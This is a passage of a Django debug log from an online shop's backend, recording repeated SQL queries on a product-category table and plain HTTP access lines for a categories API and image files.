"shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 11:20:30,688 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 11:20:30,693 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 11:20:30,697 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 11:20:30,701 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 11:20:30,707 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 11:20:30,711 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 11:20:30,716 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 11:20:30,720 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 11:20:30,724 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 11:20:30,731 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 11:20:30,734 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 11:20:30,739 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 11:20:30,743 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 11:20:30,747 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 11:20:30,751 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 11:20:30,756 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 11:20:30,760 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 11:20:30,765 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 11:20:30,769 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 11:20:30,772 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 11:20:30] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 11:20:31] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [19/Dec/2019 11:20:31] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 [19/Dec/2019 11:23:07] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-19 11:23:21,574 utils 4252 140031721535232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 11:23:21,584 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 11:23:21,590 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 11:23:21,594 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 11:23:21,600 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 11:23:21,604 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 11:23:21,608 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 11:23:21,613 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 11:23:21,617 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 11:23:21,623 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 11:23:21,627 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 11:23:21,631 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 11:23:21,635 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 11:23:21,639 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 11:23:21,644 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 11:23:21,648 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 11:23:21,652 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 11:23:21,656 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 11:23:21,660 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 11:23:21,666 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 11:23:21,671 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 11:23:21,675 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 11:23:21,679 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 11:23:21,683 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 11:23:21,687 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 11:23:21,693 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 11:23:21,697 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 11:23:21,701 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 11:23:21,705 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 11:23:21,709 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 11:23:21,715 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 11:23:21,719 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 11:23:21,723 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 11:23:21,727 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 11:23:21,731 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 11:23:21,738 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 11:23:21,742 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 11:23:21,746 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 11:23:21,750 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 11:23:21,754 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 11:23:21,758 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 11:23:21,763 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 11:23:21,767 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 11:23:21,771 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 11:23:21,776 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 11:23:21,780 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 11:23:21] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 11:23:22] "GET 